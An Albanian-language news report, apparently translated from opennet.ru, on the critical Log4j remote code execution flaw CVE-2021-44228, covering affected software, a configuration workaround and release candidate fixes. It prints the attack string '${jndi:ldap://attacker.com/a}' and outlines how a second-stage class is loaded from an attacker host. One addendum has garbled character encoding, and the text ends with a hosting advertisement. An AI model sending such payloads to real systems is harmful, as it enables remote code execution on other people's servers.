Cenueshmëri katastrofike në Apache Log4j që prek shumë projekte Java

Në Apache Log4j, një framework i njohur për menaxhimin e logjeve në aplikacionet Java, është zbuluar një dobësi kritike që lejon ekzekutimin e kodit të rastësishëm kur regjistrohet një vlerë e formatuar në mënyrë të veçantë në formatin "{jndi:URL}". Një sulm mund të realizohet në aplikacionet Java që regjistrojnë në log vlera të marra nga burime të jashtme, për shembull, kur paraqiten vlera problematike në mesazhet e gabimeve.

Vërehet se problemi i prek pothuajse të gjitha projektet që përdorin frameworke si Apache Struts, Apache Solr, Apache Druid ose Apache Flink, duke përfshirë Steam, Apple iCloud, klientët dhe serverët e lojës Minecraft. Pritet që kjo dobësi të sjellë një valë sulmesh masive ndaj aplikacioneve të korporatave, duke ripërsëritur historinë e dobësive kritike në frameworkun Apache Struts, i cili, sipas vlerësimeve, përdoret në aplikacionet web nga 65% e kompanive në listën Fortune 100. Veçmas, janë regjistruar tashmë përpjekje për skanimin e rrjetit për sisteme të prekshme.

Problemi përkeqësohet nga fakti se është publikuar tashmë një exploit funksional, por rregullimet për pastrat stabile nuk janë ofruar deri tani. Identifikuesi CVE ende nuk është caktuar. Rregullimi është përfshirë vetëm në degën testuese log4j-2.15.0-rc1. Si një zgjidhje për bllokimin e dobësisë, rekomandohet që të vendoset parametri log4j2.formatMsgNoLookups në vlerën true.

Problemi është shkaktuar nga fakti se log4j mbështet procesimin e maskave speciale "{}" në stringjet e regjistruara në log, në të cilat mund të ekzekutohen kërkesa JNDI (Java Naming and Directory Interface). Sulmi përfshin dërgimin e një stringu me zëvendësim "${jndi:ldap://attacker.com/a}", ku gjatë përpunimit log4j do të dërgojë një server kërkesë LDAP në attacker.com për rrugën në klasën Java. Rrugë e kthyer server nga sulmuesi (për shembull, http://second-stage.attacker.com/Exploit.class) do të ngarkohet dhe ekzekutohet në kontekstin e procesit aktual, duke i mundësuar sulmuesit të realizojë ekzekutimin e kodit të rastësishëm në sistem me të drejtat e aplikacionit aktual.

Shtesë 1: Dobësisë i është caktuar identifikuesi CVE-2021-44228.

ShtesĂ« 2: ËshtĂ« zbuluar njĂ« mĂ«nyrĂ« pĂ«r tĂ« anashkaluar mbrojtjen e shtuar nĂ« versionin log4j-2.15.0-rc1. ËshtĂ« propozuar njĂ« pĂ«rditĂ«sim i ri log4j-2.15.0-rc2 me njĂ« mbrojtje mĂ« tĂ« plotĂ« kundĂ«r dobĂ«sisĂ«. NĂ« kod ka njĂ« ndĂ«rlikim qĂ« lidhet me mungesĂ«n e ndalimit tĂ« menjĂ«hershĂ«m nĂ« rastin e pĂ«rdorimit tĂ« njĂ« URL JNDI tĂ« formatuar gabim.

Burimi: opennet.ru

Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster